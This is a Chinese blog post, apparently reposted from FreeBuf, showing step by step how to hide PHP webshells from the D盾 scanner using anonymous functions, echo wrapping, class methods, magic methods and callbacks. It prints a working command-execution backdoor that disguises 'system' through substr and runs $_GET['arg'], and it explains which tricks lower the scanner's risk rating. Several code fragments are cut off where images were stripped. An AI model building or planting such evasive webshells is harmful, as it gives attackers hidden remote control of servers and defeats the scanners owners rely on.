php绕过d盾,巧用匿名函数绕过D盾

于 2021-03-16 21:42:33 发布
阅读量238 收藏
点赞数
文章标签: php绕过d盾

原标题:巧用匿名函数绕过D盾

之前看了smile大佬的webshell绕过,跟着smile大佬的思路,自己来挖掘了一下绕过D盾的方式

附上链接 https://www.anquanke.com/post/id/197631

这篇文章中,smile大佬提到了非常多的绕过D盾方式,我就不重复了,我在这里主要是利用了匿名函数来绕过D盾

在p神的博客中,找到了这么一个图片

https://www.leavesongs.com/PENETRATION/dynamic-features-and-webshell-tricks-in-php.html

对常见的webshell进行了一下分类,我主要是利用了一个system 构造了一种命令型的webshell,

匿名函数

匿名函数也叫闭包函数,允许临时创建一个没有名字的函数,经常用作回调函数

会被D盾检测出来,已知后门,这里参数$name是动态获取的,但是eval不是,并且eval是一个语言构造器,不是函数,不能被可变函数调用,所以改eval为system

把函数改成动态获取的形式

会报一个级别1的风险

尝试把两个GET参数都放到函数内,再加一个substr混淆

这次还是报了一个变量函数

到这就明白了 应该是$greet这个变量函数被D盾检测出来了,不是参数的原因,再进一步分析,应该是$greet 被当作了可变函数,导致了被D盾检测出来

echo绕过

用echo括号绕过一下

a50934ff79da1ea50431ef7cd2f15097.png

改匿名函数为普通函数

刚刚前面的检测是因为可变函数,导致了webshell被检测,直接用普通的函数,不使用匿名函数

14a8db01c6bcf6ba13bfa754ee8b22c8.png

再加一个中间值$a

15c3f7529b092e70fc838b13fa9bc094.png

依然能够绕过

改变量为数组

匿名函数可以赋值给一个变量,同样也可以赋值给数组中的一个元素

D盾爆出可变函数

前面是在$greet上做了一些改变,下面再去改一下$array['func']

加上注释符

还是会爆出级别1的威胁

D盾应该也会去忽略注释的内容

回到之前的用echo 输出一下

这就绕过了D盾

1762ef0475e488d0efefa4d11903ae3f.png

和刚刚的使用变量名来接收一个匿名函数一样,都是因为可变函数的原因,阻碍了我们构造webshell,

验证一下

把最后的调用可变函数这一步改成

$aa;

$aa是一个没有任何值的变量,D盾同样会报级别1的威胁

根据$aa这里,可以得出D盾没有去回溯$array['func']这个数组变量,因为如果D盾回溯了这个$aa变量,会检测到这个$aa是一个空的函数,没有定义。也就不会报错了

前面用的是echo,换成print同样可以绕过

print ($aa); 小结

上面的绕过方式,总结一下,还是利用了echo 这种方式绕过了D盾,估计D盾把echo 后面的内容当作了字符串,正常情况下eval($_POST['a']); 是直接报级别5的,但是加上了echo 之后,报的就是级别4,看来echo还有给D盾将一个风险级别的功能

深入绕过

前面利用可变函数,其实就是为了调用构造的匿名函数,可以有两种绕过的方式

第一种:换一种调用匿名函数的方式

第二种:换掉匿名函数,比如上面直接使用了一个普通函数

接下来就去php官方文档上看了一下匿名函数的介绍,找到一个例子

https://www.php.net/manual/zh/functions.anonymous.php直接调用匿名函数

匿名函数还有一种表达方式,不用赋值,直接调用,仅在php7里可以调用

46db644465ccf590cb0920a915095516.png

类绕过

在面向过程的语言里,函数就叫函数,但在面向对象的语言里,函数还有另一种叫法,方法

通过构造一个类的方法,说不定就能绕过D盾的检测

类的方法

匿名函数可以放在方法的返回值中,构造一个方法来调用,这时候D盾把$b,当作一个方法,从而绕过可变函数的检测

testing; $b; ?>

可以绕过

1e7abce74c9af107f5ab79750ebbaf41.png

赋值给变量

也可以不放在函数的返回值中,直接把匿名函数赋值给一个变量,更方便一点

greet = function { $method='sysatem'; (substr($method,0,3).substr($method, 4))($_GET['arg']); }; } } $a=new Test; //var_dump($a->greet); $b=$a->greet; $b; ?>

582ea8d6f6c5a4f8f523dfa3b1eba61d.png

利用魔术方法

利用上之前的echo函数,把一个对象当作字符串输出,可以触发__toString魔术方法,还可以利用上其他的魔术方法,__call __set __get等

b2b0154a5711fa8836b80ed04b2e0be2.png

回调函数

简单来说,当给一个函数传入参数时,传入了一个函数作为参数就叫函数回调

使用回调函数换掉可变函数,调用匿名函数

call_user_func

5b0afe6222cd02f7a4deaf9e7232d07a.png

数组赋值

$greet 赋值给数组,也可以执行

同样可以绕过

总结一下:

主要是利用了匿名函数的一些构造方式,执行代码的核心点还是(substr($method,0,3).substr($method, 4))($_GET['arg']); 没有变过

主要是在可变函数这里展开了一些绕过方式,让D盾检测不出来

*本文原创作者:p1k3m4n,本文属于FreeBuf原创奖励计划,未经许可禁止转载返回搜狐,查看更多

责任编辑:

躺着不干活
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值